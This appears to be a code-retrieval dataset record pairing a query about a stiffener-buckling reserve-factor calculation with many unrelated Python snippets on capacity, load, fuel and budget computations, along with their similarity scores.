(-10.0*np.log10(self.isi_dj_refl_closed) - self.p_isi_center) # column L\n self.p_isi_dj_corners = (-10.0*np.log10(self.isi_dj_corners) -self.p_isi_center -self.p_isi_corners) # column M\n\n\n # calculate the \"cross\" penalty contribution, column S\n arg1 = ((self.sigma_blw**2 + self.v_rin)/ np.square(self.isi_dj_refl_closed))\n arg2 = self.l_1 - (self.Q**2)*(arg1 + self.v_mn + np.square(self.sigma_mpn))\n arg3 = (-10.0*np.log10(np.multiply(self.isi_dj_refl_closed, np.sqrt(arg2))))\n self.p_cross_center = ( # column S\n arg3\n - self.p_blw # cell T13\n - self.p_isi_center # column J\n - self.p_isi_dj_center # column L\n - self.p_mpn # column Q\n - self.p_reflection # column N\n - self.p_rin # column R\n - self.pmn*self.l_1) # cell G13\n print('p_isi_center: ', self.p_isi_center)\n\n # calculate the total power budget evaluated at the center of the eye\n self.p_total_center = ( # column T\n self.p_isi_center # column J\n + self.p_isi_dj_center # column L\n + self.p_atten # column B\n + self.p_mpn # column Q\n + self.p_reflection # column N\n + self.p_rin # column R\n + self.p_cross_center # column S\n + self.pmn*self.l_1) # cell G13\n # calculate the total power budget evaluated at the corner of the eye\n self.p_total_corners = (\n self.p_isi_center # column J\n + self.p_isi_corners # column K\n + self.p_atten # column B\n + self.p_mpn # column Q\n + self.p_reflection # column N\n + self.p_rin # column R\n + self.p_cross_center # column S\n + self.pmn*self.l_1 # cell G13\n + self.p_isi_dj_corners)# column M\n\n # receiver stressed sensitivity\n self.margin = ( self.p_budget\n - self.p_total_center) # column W\n\n self.rx_stressed_sensitivity = (\n self.tx_oma_min*self.l_1\n - self.chil\n - self.p_mpn\n - self.p_reflection\n - self.p_rin\n - 0.5*self.p_cross_center\n - self.pmn*self.l_1\n - self.margin[self.lnum//2]*self.l_1)\n\n\n # end of GbE10.penalty_calc\n #======================================================================+", "def ram_condition(min_gb=3):\n return get_free_gb() < min_gb", "def premium(self):\n premium = 0\n for weight, mean, std in zip(self.weights, self.means, self.stds):\n shift = (self.data['riskfree'] - mean) * self.data['maturity']\n moneyness = np.array(self.data['moneyness']) + shift\n premium += weight * blackscholes_norm(moneyness,\n self.data['maturity'],\n std, self.data['call'])\n return premium", "def getRepairCapacity(self):\n return int(self.myDesign.getSYCRequired() * (1-(self.strength/100.0)))", "def trucks_required(self) -> int:\n daily_demand = (\n self.total_demand() / self.operations.productivity.working_days_per_year\n )\n trucks_required = np.ceil(\n daily_demand\n / (self.operations.avg_vol_per_lift() * self.inputs.lifts_per_truck_day)\n )\n return trucks_required", "def qty_available(quant) -> float:\n return quant.quantity - quant.reserved_quantity", "def infect(self, viral_load):\n if self.health <= 29:\n self.health = self.health - (0.1 * viral_load)\n elif self.health > 29 and self.health < 50:\n self.health = self.health - (1.0 * viral_load)\n elif self.health > 50:\n self.health = self.health - (2.0 * viral_load)", "def calculate_br_up_metric(br_up):\n if br_up < 1:\n br_up = 1\n min_baud = 1200\n max_baud = 38400\n\n num = np.log(br_up) - np.log(min_baud)\n den = np.log(max_baud) - np.log(min_baud)\n\n return (num / den + 0.1).clip(min=0, max=1)", "def prescaler(self) -> int:", "def regenShields(self, kW, kWtoSPfactor):\n remainder = kW \n if self.currentSP < self.maxSP:\n # how many kW required to fully charge?\n # desiredSP = kWneeded * fact\n # kWneeded = desiredSP/fact\n desiredSP = self.maxSP - self.currentSP\n kWneeded = desiredSP / kWtoSPfactor\n if kW > kWneeded:\n remainder = kW - kWneeded\n #print \"more kW than need for sheilds; remainder\",remainder\n else:\n remainder = 0\n \n self.currentSP += (kW * kWtoSPfactor)\n if self.currentSP > self.maxSP:\n self.currentSP = self.maxSP\n self.myParent.updateMyGUIValue(self.position+'Shields', self.currentSP)\n return remainder", "def canopy_heat_capacity(states: ClimateStates) -> float:\n return CAP_LEAF * states.leaf_area_index", "def balanceFactor(self):\n leftHeight = self.left.height if self.left != None else 0\n rightHeight = self.right.height if self.right != None else 0\n return rightHeight - leftHeight", "def __call__(self, auctioneer):\n curr_bid = auctioneer.current_bid\n bid_price = curr_bid * self._bid_increase_perc\n if bid_price <= self._budget and self.get_bid_probability() > 0.3:\n self._highest_bid = bid_price\n return bid_price\n return 0", "def cakes(recipe, available):\n return min({k: available[k]//recipe[k] if k in available else 0 for k in recipe}.values())", "def calculate_supply(self):\r\n \r\n for cell in self.cells:\r\n cell.supply = min(self.max_volume,\r\n self.wave_speed / self.free_speed *\r\n (self.cell_length * self.jam_density -\r\n cell.volume)) /self.interval\r\n self.supply = self.cells[0].supply", "def calc_generation_wind_proposed (self):\n if self.comp_specs['proposed capacity'] != UNKNOWN:\n self.load_offset_proposed = \\\n self.comp_specs['proposed capacity']\n self.generation_wind_proposed = \\\n self.comp_specs['proposed generation']\n\n if self.generation_wind_proposed == UNKNOWN:\n self.generation_wind_proposed = self.load_offset_proposed *\\\n float(self.comp_specs\\\n ['capacity factor'])*\\\n constants.hours_per_year\n\n return\n\n self.load_offset_proposed = 0\n\n offset = self.average_load*\\\n (self.comp_specs['percent generation to offset'] / 100.0)\n #~ print self.forecast.generation['generation hydro'].sum()\n\n # removed on purpose\n #~ hydro = \\\n #~ self.forecast.generation['generation hydro'].fillna(0).sum()\n #~ if hydro > 0:\n #~ offset *= 2\n\n # existing very variable RE\n existing_RE = \\\n int(float(self.cd['wind capacity'])) + \\\n int(float(self.cd['solar capacity']))\n\n if existing_RE < (round(offset/25) * 25): # ???\n #~ print \"True\"\n self.load_offset_proposed = round(offset/25) * 25 - existing_RE\n\n\n\n # not needed for now\n #~ self.total_wind_generation = self.generation_load_proposed + \\\n #~ int(self.comp_specs['wind capacity'])\n\n self.generation_wind_proposed = self.load_offset_proposed * \\\n float(self.comp_specs['capacity factor'])*\\\n constants.hours_per_year\n #~ print 'self.load_offset_proposed',self.load_offset_proposed\n #~ print 'self.generation_wind_proposed',self.generation_wind_proposed", "def useWater(self, used):\n self.amount = max(0, self.amount - used)", "def calculate_upper_boundary(self, divisor):\n\n # see how high you can go\n quotas = [0] * self.states\n fair_shares = [0] * self.states\n counter = 0\n highest_divisor = 0\n prev_divisor = 0\n estimator = 1000000000\n while counter < 1000:\n for i, population in enumerate(self.populations):\n if divisor is None:\n return None\n quotas[i] = population / divisor\n fair_shares[i] = math.floor(quotas[i])\n if sum(fair_shares) != self.num_seats:\n estimator = estimator / 10\n prev_divisor = divisor\n divisor = highest_divisor + estimator\n else:\n highest_divisor = divisor\n divisor = prev_divisor + estimator\n if highest_divisor == divisor:\n break\n counter += 1\n return math.floor(highest_divisor * 1000) / 1000", "def get_remaining_fuel(self):\n return min(self.liquid_fuel, self.oxidizer)", "def _cost_caught_by_police(self):\n if self.fine_frequency != 0:\n if self.number_of_courses % self.fine_frequency == 0 and self.number_of_courses != 0:\n if self.number_of_courses % self.fine_frequency_paid_by_driver == 0 and self.number_of_courses != 0:\n self.fine_paid_number_of_courses += 1\n fine_value = np.random.choice([100, 200, 500], p=[0.25, 0.4, 0.35])\n self.total_penalty_points += self._add_penalty_points() # adding penalty points\n return fine_value\n else:\n return 0\n else:\n return 0\n else:\n return 0", "def get_risk_per_unit(price, sl_price):\n return abs(price - sl_price)", "def calculate_init_stock(self, good=None):\n # random quantity * systemsize * techlevel (hence, it can be zero)\n size = self.planet.system_size\n level = self.planet.tech_level\n stock = random.randrange(0, 25) * (size + 1) * level\n\n # SPECIALRESOURCES add 50% production\n if self.planet.special in [self.tradeitem.cr]:\n stock = stock + (stock * 0.5)\n\n # TODO enhancement: difficulty levels should affect fuel stocks\n if good in ['fuel']:\n stock = stock * 10\n\n return int(stock)", "def get_min_takeover(cell: Cell) -> int:\n if cell.creature == 'humans':\n return math.ceil(cell.number * parameters.HUMANS_TAKEOVER_FACTOR)\n return math.ceil(cell.number * parameters.OPPONENT_TAKEOVER_FACTOR)", "def rebalance_weightings(context):\r\n total_ratio = 0\r\n log.info(\"*******Rebalancing weightings********\")\r\n print(context.up_ratios)\r\n \r\n for asset, ratio in context.up_ratios.items():\r\n total_ratio += ratio\r\n \r\n for asset, ratio in context.up_ratios.items():\r\n context.max_weights[asset] = ratio/total_ratio\r\n \r\n log.info(context.max_weights)", "def upper_bound(stock):\n counter=0\n for i in stock_price(stock):\n if i >= resistance(stock):\n counter+=1\n return counter", "def fuel_required(mass):\n return max(math.floor(mass/3) - 2, 0)", "def MINIMUM_BET() -> int:\n return 10", "def initial_balance(self) -> Quantity:\n return self._initial_balance", "def overhead(readings):\n return 100.0 * (int(readings[0]) + int(readings[1])) / (int(readings[2]) + int(readings[3]))", "def unfair_coins(num_coins, num_unfair, percent_unfair, heads_needed):\n\tpart_fair = (num_coins - num_unfair) / num_coins\n\tpart_unfair = num_unfair / num_coins\n\tprob_fair = 0.5**heads_needed\n\tprob_unfair = (percent_unfair / 100)**heads_needed\n\treturn part_fair * prob_fair + part_unfair * prob_unfair", "def calc_pre_intertie_generation (self):\n\n self.pre_intertie_generation = \\\n self.forecast.get_generation(self.start_year,self.end_year)\n\n gen_eff = self.cd[\"diesel generation efficiency\"]\n self.pre_intertie_generation_fuel_used = \\\n self.pre_intertie_generation / gen_eff\n\n #~ print 'self.baseline_generatio',self.baseline_generation", "def weight_multiplier(self):\n return CONF.PF9.vcpu_weight_multiplier", "def fuel_required(mass):\n return int(floor(mass / 3) - 2)", "def calc_boiler_const(Q_load_Wh, thermal_efficiency):\n Q_fuel_Wh = Q_load_Wh / thermal_efficiency\n Q_losses_Wh = Q_fuel_Wh - Q_load_Wh\n\n return Q_fuel_Wh, Q_losses_Wh", "def stealability(self):\n stealability_score = float(self.price) / float(self.weight)\n print (stealability_score)\n\n if stealability_score < 0.5:\n return 'Not so stealable...'\n elif stealability_score >= 0.5 and stealability_score < 1.0:\n return 'Kinda stealable.'\n else:\n return 'Very stealable!'", "def dilutionneeded(self) -> float:\n return self.stock*1.0/self.final", "def get_allowable_fraction_without(mem_to_reserve, cuda_device_index):\n current_free = get_free_gpu_memory(cuda_device_index)\n allowable = current_free - mem_to_reserve # 1GB\n allowable_fraction = allowable / current_free\n if allowable_fraction <= 0.0:\n raise ValueError(f\"Can't leave 1GB over for the inference kernel, because\"\n f\" there is only {allowable} total free GPU memory.\")\n return allowable_fraction", "def calculate_overbook_num(self):\n\n overbook_level_decimal = self.overbook_level / float(100.0)\n return self.num_rooms + math.ceil(overbook_level_decimal * self.num_rooms)", "def budget_used(self):\n return int(self.total_spent() / self.budget() * 100.0)", "def getBalanceFactor(self):\n \n return (self._leftSubtreeHeight - self._rightSubtreeHeight)", "def _check_capacity_limit(self, res, amt, balance, meta, raven_vars, dispatch, t, level):\n # note \"amt\" has units of AMOUNT not RATE (resource, not resource per second)\n sign = np.sign(amt)\n # are we storing or providing?\n #print('DEBUGG supposed current level:', level)\n if sign < 0:\n # we are being asked to consume some\n cap, meta = self.get_capacity(meta, raven_vars, dispatch, t)\n available_amount = cap[res] - level\n #print('Supposed Capacity, Only calculated ins sign<0 (being asked to consumer)',cap)\n else:\n # we are being asked to produce some\n available_amount = level\n # the amount we can consume is the minimum of the requested or what's available\n delta = sign * min(available_amount, abs(amt))\n return {res: delta}, meta", "def revenue_landfill(self) -> float:\n return self.income_statement.revenue.operating_revenue * (\n 1 - self.inputs.allocation_to_collection_unit\n )", "def overall_reduction(self):\n return 84", "def min_brightness(self):\n return .0", "def constrain(amt,low,high):\n if amt < low:\n return low\n elif amt > high:\n return high\n else:\n return amt", "def _compute_quantization_factor(self):\n self._quantization_factor = (float(self._full_value_range) /\n self._number_of_intervals)\n logging.debug(\n 'full value range: %r, number of intervals: %r',\n self._full_value_range, self._number_of_intervals)\n logging.debug('quantization factor: %r', self._quantization_factor)", "def test_loc_techs_resource_capacity_constraint(self, override):\n\n if override is None:\n m = build_model(\n {}, \"simple_supply_and_supply_plus,two_hours,investment_costs\"\n )\n m.run(build_only=True)\n expr = m._backend_model.resource_cap[(\"b\", \"test_supply_plus\")]\n assert expr.lb == 0\n assert expr.ub == np.inf\n\n else:\n m = build_model(\n {\n \"techs.test_supply_plus.constraints.resource_cap_{}\".format(\n override\n ): 10\n },\n \"simple_supply_and_supply_plus,two_hours,investment_costs\",\n )\n m.run(build_only=True)\n expr = m._backend_model.resource_cap[(\"b\", \"test_supply_plus\")]\n if override == \"max\":\n assert expr.ub == 10\n assert expr.lb == 0\n elif override == \"equals\":\n assert expr.ub == 10\n assert expr.lb == 10\n if override == \"min\":\n assert expr.lb == 10\n assert expr.ub == np.inf", "def critical_thickness(self):\n horizontal_tail_thickness = sorted(self.stabilizer_h.solid.faces, key=lambda f: f.cog.y)[-1].bbox.height\n vertical_tail_thickness = sorted(self.stabilizer_vright.solid.faces, key=lambda f: f.cog.z)[0].bbox.length\n if horizontal_tail_thickness >= vertical_tail_thickness:\n critical_thickness = horizontal_tail_thickness\n else:\n critical_thickness = vertical_tail_thickness\n return critical_thickness", "def get_load_factor(self):\n # Your code here\n return self.count/len(self.data)", "def bike_multiplier(bikelane, bicycle_pref):\n result = bicycle_pref * 0.8\n if bikelane=='Yes':\n return -result\n return 0.0", "def branching_factor(data, loc):\n\n return 20", "def lot_leverage(self): \n return 20", "def recommend_contract(meter_load, percentile=100.0):\n\n load_value = np.nanpercentile(meter_load[meter_load != 0], percentile)\n\n for contract in contracts_available:\n if load_value < contract:\n return contract/kW\n\n return contracts_available[-1]/kW", "def scale_blackhurst_results_to_usgs_values(\n df_load, attr, download_FBA_if_missing):\n # determine national level published withdrawal data for usgs mining\n # in FBS method year\n pv_load = load_fba_w_standardized_units(\n datasource=\"USGS_NWIS_WU\", year=str(attr['helper_source_year']),\n flowclass='Water', download_FBA_if_missing=download_FBA_if_missing)\n\n pv_sub = pv_load[(pv_load['ActivityConsumedBy'] == 'Mining') &\n (pv_load['Compartment'] == 'total') &\n (pv_load['FlowName'] == 'total')].reset_index(drop=True)\n # rename the published value flow name and merge with Blackhurst data\n pv_sub = pv_sub.rename(columns={'FlowAmount': 'pv'})\n df = df_load.merge(pv_sub[['Location', 'pv']], how='left')\n # calculate the difference between published value and allocated value\n # for each naics length\n df = df.assign(nLen=df['SectorConsumedBy'].apply(lambda x: len(x)))\n # calculate initial FlowAmount accounted for\n df = df.assign(av=df.groupby('nLen')['FlowAmount'].transform('sum'))\n # calc difference\n df = df.assign(vd=df['pv'] - df['av'])\n\n # subset df to scale into oil and non-oil sectors\n df['sector_label'] = np.where(df['SectorConsumedBy'].apply(\n lambda x: x[0:5] == '21111'), 'oil', 'nonoil')\n df['ratio'] = np.where(df['sector_label'] == 'oil', 2 / 3, 1 / 3)\n df['label_sum'] = df.groupby(['Location', 'nLen', 'sector_label'])[\n 'FlowAmount'].transform('sum')\n\n # calculate revised water withdrawal allocation\n df_scaled = df.copy()\n df_scaled.loc[:, 'FlowAmount'] = \\\n df_scaled['FlowAmount'] + \\\n (df_scaled['FlowAmount'] / df_scaled['label_sum']) * \\\n (df_scaled['ratio'] * df_scaled['vd'])\n df_scaled = df_scaled.drop(columns=['sector_label', 'ratio', 'nLen',\n 'label_sum', 'pv', 'av', 'vd'])\n\n return df_scaled", "def calculate_demand(self):\r\n \r\n for cell in self.cells:\r\n cell.demand = min(cell.volume, self.max_volume) /self.interval\r\n self.demand = self.cells[-1].demand", "def get_occupant_room_load_for_cooling_balanced(\n l_cs: np.ndarray, l_cl: np.ndarray, q_d_trs_prt: np.ndarray) -> (np.ndarray, np.ndarray):\n\n l_d_cs = np.where(l_cs[0:5] > 0.0, l_cs[0:5] - q_d_trs_prt, 0.0)\n l_d_cl = l_cl[0:5]\n\n return np.clip(l_d_cs, 0.0, None), np.clip(l_d_cl, 0.0, None)", "def load_factor(self):\n return round(self._n / self._size, 2)", "def u_crit(state, sys):\n s = state[0]\n i = state[1]\n tau = scipy.interpolate.interp1d(sys.tau.s, sys.tau.i, kind = \"cubic\")\n phi = scipy.interpolate.interp1d(sys.phi.s, sys.phi.i, kind = \"cubic\")\n cc = scipy.interpolate.interp1d(sys.commutation_curve[0],\n sys.commutation_curve[1],\n kind = \"cubic\")\n if i > sys.imax:\n return sys.umax\n if s <= sys.commutation_curve[0][-1]:\n #print(\"Case 1\")\n if s < sys.sbar or i < tau(s):\n return 0\n return sys.umax\n elif s > sys.commutation_curve[0][-1] and s < sys.commutation_curve[0][0]:\n #print(\"Case 2\")\n if ((i > tau(s)) and (i < cc(s))) or (i > sys.imax):\n return sys.umax\n elif i > cc(s) and i < sys.imax:\n return 0\n else:\n return 0\n else:\n #print(\"Case 3\")\n if i > sys.imax:\n return sys.umax\n elif s > sys.sstar and i > phi(s):\n return sys.umax\n return 0", "def max_duffel_bag_value(cakes, capacity):\n curr_w = 0 # current weight of the bag\n price = 0\n cakes.sort(reverse=True, key=lambda c: c[1]/c[0] if c[0] else sys.maxsize)\n for cake in cakes:\n if cake[0] == 0: return sys.maxsize # infinite number of cakes can be taken\n while (curr_w + cake[0]) <= capacity:\n curr_w += cake[0]\n price += cake[1]\n return price", "def _cost_refueling(self):\n if self.number_of_courses % self.refueling_frequency == 0 & self.number_of_courses != 0:\n lowest_amount = self.refueling_liter_range[0] # take a minimum value\n highest_amount = self.refueling_liter_range[1] # take a maximum value\n refueled_petrol = randint(lowest_amount, highest_amount)\n cost = refueled_petrol * self.petrol_cost\n return cost\n else:\n return 0", "def reusability(self):\n self._reusability = -0.25 * self.DCC + 0.25 * self.CAMC + 0.5 * self.CIS + 0.5 * self.DSC\n return round(self._reusability, 5)", "def calc_reduction_diesel_used (self):\n self.reduction_diesel_used = self.diesel_equiv_captured - \\\n self.loss_heat_recovery\n #~ print 'self.reduction_diesel_used',self.reduction_diesel_used", "def capacity_factor(self, value: float) -> None:\n # State S, I, E, SE, or EE\n self._capacity_factor = value", "def soft_thresh(x: float, lmb: float) -> float:\n if x < lmb:\n return x + lmb\n elif x > lmb:\n return x - lmb\n else:\n return 0.0", "def exceeds_shelf_capacity(shelf, fabric):\n shelf_total = Decimal(shelf.fabrics.all().aggregate(Sum('quantity_th'))['quantity_th__sum'] or 0)\n return True if (shelf_total) + fabric.quantity > max_shelf_qty else False", "def get_roi_ub_cost(pooled_h, pooled_w, proposal_num_per_tiling):\n roi_start_h_cost = pooled_h * proposal_num_per_tiling * 4\n roi_start_w_cost = pooled_w * proposal_num_per_tiling * 4\n roi_bin_h_cost = pooled_h * proposal_num_per_tiling * 4\n roi_bin_w_cost = pooled_w * proposal_num_per_tiling * 4\n roi_start_w_from0_cost = pooled_w * proposal_num_per_tiling * 4\n proposals_ub_int32_cost = 5 * proposal_num_per_tiling * 4\n roi_height_cost = proposal_num_per_tiling * 4\n roi_width_cost = proposal_num_per_tiling * 4\n const_value_cost = 64 * 4\n const_zero_cost = 64 * 4\n calced_rois_scalar = 4\n range_end_scalar = 4\n proposal_ub_validnum = 4\n\n return roi_start_h_cost + roi_start_w_cost + roi_bin_h_cost + \\\n roi_bin_w_cost + roi_start_w_from0_cost + \\\n proposals_ub_int32_cost + roi_height_cost + roi_width_cost + \\\n const_value_cost + const_zero_cost + calced_rois_scalar + \\\n range_end_scalar + proposal_ub_validnum", "def calc_DC_supply(t_0, t_1):\n if t_0 == 0:\n t_0 = 1E6\n if t_1 > 0:\n tmin = min(t_0, t_1)\n else:\n tmin = t_0\n return tmin", "def heat_capacity_of_air(self) -> float:\n\n return 1002.5 + 275 * (10 ** (-6)) * (self.ambient_temperature - 200) ** 2", "def ratio_local_prod(self):\n if self.current_energy_produced == 0.0:\n return 1.0\n else:\n return 1. - self.export_grid / self.current_energy_produced", "def capacity_factor(self, update=False,\n min_cap_fact=None, max_cap_fact=None):\n if update or self._dfs['capacity_factor'] is None:\n self._dfs['capacity_factor'] = pudl.analysis.mcoe.capacity_factor(\n self, min_cap_fact=min_cap_fact, max_cap_fact=max_cap_fact)\n return self._dfs['capacity_factor']", "def buying_price(self):\n buy_price = self.standard_init_price()\n # Special status and resources price adaptation\n if self.planet.status in [self.tradeitem.dps]:\n buy_price = (buy_price * 5) / 3\n\n elif self.planet.special in [self.tradeitem.cr]:\n buy_price = (buy_price * 3) / 4\n\n elif self.planet.special in [self.tradeitem.er]:\n buy_price = (buy_price * 4) / 3\n\n # randomize a bit\n moins = random.randrange(self.tradeitem.var)\n plus = random.randrange(self.tradeitem.var)\n buy_price = buy_price - moins + plus\n\n # price can't be negative\n if buy_price < 0:\n buy_price = 0\n\n return int(buy_price)", "def new_capacity_rule(mod, g, p):\n return 0", "def ram_prop_condition(prop=0.25):\n mem_info = get_mem_info()\n total_mem = float(mem_info['MemTotal'].value) / 10**6\n min_gb = prop * total_mem\n return ram_condition(min_gb=min_gb)", "def _get_money_earned(tier):\n return int(((tier**2) * 10) + 10)", "def calcul_risk(self):\n if (self.take_profit - self.buy_price) >= (\n self.buy_price - self.stop_loss\n ) * self.risk:\n return True\n else:\n return False", "def CalcEffectiveInventory(self):\r\n return (self.currentStock - self.currentOrders)", "def mimic_generation_capacity(base_grid, ref_grid):\n base_plant = base_grid.plant\n ref_plant = ref_grid.plant\n plant_scaling = ref_plant.Pmax / base_plant.Pmax\n # Element-wise division will return NaN for plants not in ref_grid\n plant_scaling = plant_scaling.fillna(0)\n change_table = _calculate_common_zone_factors(base_plant, ref_plant, plant_scaling)\n return change_table", "def determine_unit_limits(DISPATCHLOAD, BIDPEROFFER_D):\n\n # Override ramp rates for fast start units.\n ic = DISPATCHLOAD # DISPATCHLOAD provides the initial operating conditions (ic).\n ic['RAMPMAX'] = ic['INITIALMW'] + ic['RAMPUPRATE'] * (5 / 60)\n ic['RAMPUPRATE'] = np.where((ic['TOTALCLEARED'] > ic['RAMPMAX']) & (ic['DISPATCHMODE'] != 0.0),\n (ic['TOTALCLEARED'] - ic['INITIALMW']) * (60 / 5), ic['RAMPUPRATE'])\n ic['RAMPMIN'] = ic['INITIALMW'] - ic['RAMPDOWNRATE'] * (5 / 60)\n ic['RAMPDOWNRATE'] = np.where((ic['TOTALCLEARED'] < ic['RAMPMIN']) & (ic['DISPATCHMODE'] != 0.0),\n (ic['INITIALMW'] - ic['TOTALCLEARED']) * (60 / 5), ic['RAMPDOWNRATE'])\n\n # Override AVAILABILITY when SEMIDISPATCHCAP is 1.0\n ic = pd.merge(ic, BIDPEROFFER_D.loc[:, ['DUID', 'MAXAVAIL']], 'inner', on='DUID')\n ic['AVAILABILITY'] = np.where((ic['MAXAVAIL'] < ic['AVAILABILITY']) & (ic['SEMIDISPATCHCAP'] == 1.0) &\n (ic['TOTALCLEARED'] <= ic['MAXAVAIL']), ic['MAXAVAIL'],\n ic['AVAILABILITY'])\n\n # Where the availability is lower than the ramp down min set the AVAILABILITY to equal the ramp down min.\n ic['AVAILABILITY'] = np.where(ic['AVAILABILITY'] < ic['RAMPMIN'], ic['RAMPMIN'], ic['AVAILABILITY'])\n\n # Format for compatibility with the Spot market class.\n ic = ic.loc[:, ['DUID', 'INITIALMW', 'AVAILABILITY', 'RAMPDOWNRATE', 'RAMPUPRATE']]\n ic.columns = ['unit', 'initial_output', 'capacity', 'ramp_down_rate', 'ramp_up_rate']\n return ic" ]
[ "0.6202992", "0.59245586", "0.57835984", "0.57430667", "0.56664133", "0.56359935", "0.55884063", "0.55883443", "0.5531915", "0.54831076", "0.5470007", "0.54357696", "0.5415667", "0.5415524", "0.5412604", "0.5383835", "0.53750026", "0.5356168", "0.53061926", "0.52848005", "0.5238898", "0.5220192", "0.52170444", "0.5203145", "0.5200203", "0.51928395", "0.5185715", "0.51710165", "0.516259", "0.51553595", "0.51423657", "0.51357365", "0.5135736", "0.51173425", "0.5110606", "0.510807", "0.5100612", "0.51003283", "0.5092416", "0.5090695", "0.5086512", "0.508334", "0.5082599", "0.5076039", "0.5062241", "0.50613123", "0.505947", "0.50434047", "0.50245374", "0.50144625", "0.5012834", "0.50024027", "0.49998355", "0.49964756", "0.49931473", "0.4991887", "0.4990301", "0.4985744", "0.49731517", "0.49710408", "0.4968335", "0.4967533", "0.496553", "0.49641454", "0.49625704", "0.49432975", "0.49383578", "0.49379227", "0.4918235", "0.49162522", "0.49102354", "0.4910165", "0.4907909", "0.4905342", "0.49048612", "0.49020252", "0.49014473", "0.48960605", "0.48935887", "0.48923737", "0.48919407", "0.4887938", "0.48872718", "0.48845112", "0.4884306", "0.48831803", "0.4881225", "0.48809364", "0.4879541", "0.48767114", "0.48725772", "0.48692274", "0.48664388", "0.48660475", "0.4863709", "0.48562837", "0.48557508", "0.48545608", "0.48445442", "0.4843869" ]
0.5172448
27
Calculate the reserve factor for Stiffener Buckling by calculating the critical load and comparing to the applied load. Return the reserve factor adjusted for inequalities based around ==0
def stiffenerBuckle(dim): bst = dim[0] tst = dim[1] tsk = dim[2] epsilont = kt * ((tst / bst)) ** 2 Et = (Esk * tsk) + (Est * ((bst * tst) / bsk)) Nst = Et*epsilont # Critical Load rsf = Nst/Nx return rsf - 1 # Using a target Reserve Factor of 1
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def calculate_lower_boundary(self, divisor):\n\n # see how low you can go\n quotas = [0] * self.states\n fair_shares = [0] * self.states\n counter = 0\n lowest_divisor = 0\n prev_divisor = 0\n estimator = 1000000000\n while counter < 1000:\n for i, population in enumerate(self.populations):\n if divisor is None or population is None:\n return None\n quotas[i] = population / divisor\n fair_shares[i] = math.floor(quotas[i])\n if sum(fair_shares) != self.num_seats:\n estimator = estimator / 10\n prev_divisor = divisor\n divisor = lowest_divisor - estimator\n else:\n lowest_divisor = divisor\n divisor = prev_divisor - estimator\n if lowest_divisor == divisor:\n break\n counter += 1\n return math.ceil(lowest_divisor * 1000) / 1000", "def get_load_factor(self):\n # Your code here\n return self.total_items / self.capacity", "def internal_external_canopy_heat_capacity(lumped_cover_heat_capacity: float) -> float:\n return 0.1 * lumped_cover_heat_capacity", "def ComputeRegenerativeBraking(self):\r\n pass", "def lower_bound(stock):\n counter=0\n for i in stock_price(stock):\n if i <= support(stock):\n counter+=1\n return counter", "def base_reserve_0():\n print('Setting base reserve to 0')\n upgrade('basereserve', 'base_reserve_in_stroops', 0)", "def calculate_effective_capacitance(self, load):\n c_load = load\n # In fF\n c_para = spice[\"min_tx_drain_c\"] * (self.nmos_size / parameter[\"min_tx_size\"])\n transition_prob = 0.1875\n return transition_prob * (c_load + c_para)", "def qty_available(quant) -> float:\n return quant.quantity - quant.reserved_quantity", "def standard_init_price(self):\n # If a system can't use something, its price is zero.\n _good = self.tradeitem\n if self.planet.tech_level < _good.tu and _good.name not in 'fuel':\n base_price = 0\n else:\n base_price = _good.plt + (self.planet.tech_level * _good.pi)\n # if good is highly requested, increase the price\n if self.planet.status in [_good.dps]:\n base_price = base_price + (base_price * 0.5)\n # large system: high production decreases prices\n base_price = (base_price * (100 - self.planet.system_size)) / 100\n\n # price can't be negative\n if base_price < 0:\n base_price = 0\n\n return int(base_price)", "def get_amount_in(amount_out, reserve_in, reserve_out):\n assert amount_out > 0\n assert reserve_in > 0 and reserve_out > 0\n numerator = reserve_in*amount_out*1000\n denominator = (reserve_out - amount_out)*997\n return float(numerator/denominator + 1)", "def spendFuelToSurvive(self):\n fuelNeeded = self.getLightUpkeep()\n woodNeeded = math.ceil(\n fuelNeeded / self.configs[\"parameters\"][\"RESOURCE_TO_FUEL_RATE\"][\"WOOD\"]\n )\n woodUsed = min(self.cargo[\"wood\"], woodNeeded)\n fuelNeeded -= woodUsed * self.configs[\"parameters\"][\"RESOURCE_TO_FUEL_RATE\"][\"WOOD\"]\n self.cargo[\"wood\"] -= woodUsed\n if fuelNeeded <= 0:\n return True\n\n coalNeeded = math.ceil(\n fuelNeeded / self.configs[\"parameters\"][\"RESOURCE_TO_FUEL_RATE\"][\"COAL\"]\n )\n coalUsed = min(self.cargo[\"coal\"], coalNeeded)\n fuelNeeded -= coalUsed * self.configs[\"parameters\"][\"RESOURCE_TO_FUEL_RATE\"][\"COAL\"]\n self.cargo[\"coal\"] -= coalUsed\n\n if fuelNeeded <= 0:\n return True\n\n uraniumNeeded = math.ceil(\n fuelNeeded / self.configs[\"parameters\"][\"RESOURCE_TO_FUEL_RATE\"][\"URANIUM\"]\n )\n uraniumUsed = min(self.cargo[\"uranium\"], uraniumNeeded)\n fuelNeeded -= uraniumUsed * self.configs[\"parameters\"][\"RESOURCE_TO_FUEL_RATE\"][\"URANIUM\"]\n self.cargo[\"uranium\"] -= uraniumUsed\n\n if fuelNeeded <= 0:\n return True\n\n return fuelNeeded <= 0", "def upper_bound(stock):\n counter=0\n for i in stock_price(stock):\n if i >= resistance(stock):\n counter+=1\n return counter", "def penalty_calc(self):\n self.p_budget = (self.tx_oma_min - self.rx_unstressed_sensitivity - self.fiber_conn_loss)*self.l_1\n\n # fiber attenuation,\n self.p_atten = self.alpha*self.length # column B\n\n # calculate bandwidth for RIN test (exclude transmitter)\n rin_inverse_bw = np.sqrt(np.square(1.0/self.bw_cd) + np.square(1.0/self.bw_md) + (0.477/(self.rx_bw**2))*self.l_1)\n rin_bw = 1.0 / rin_inverse_bw\n\n # see FC-MSQS-2 equation B.47 in Annex B.4 for the following k_rin = math.sqrt(2.0/math.pi)*erfinv(0.8)\n k_rin = 0.7\n\n # v_rin,\n self.v_rin = (k_rin*1E6*(self.rin_test_isi**2)*rin_bw*\n math.pow(10.0,0.1*self.rin)) # column AK\n\n # Prin,\n print('v_rin: ', self.v_rin)\n print('Q: ',self.Q)\n print('isi_dj_refl_closed :', self.isi_dj_refl_closed)\n self.p_rin = -10.0*np.log10(np.sqrt(1.0-np.multiply(self.v_rin, np.square(self.Q/self.isi_dj_refl_closed)))) # column R\n print(\"P_rin : \", self.p_rin)\n self.beta = (3.14159E-6*self.speedup*self.br_nominal *self.delta_lambda*self.d1*self.length) # column O\n self.sigma_mpn = 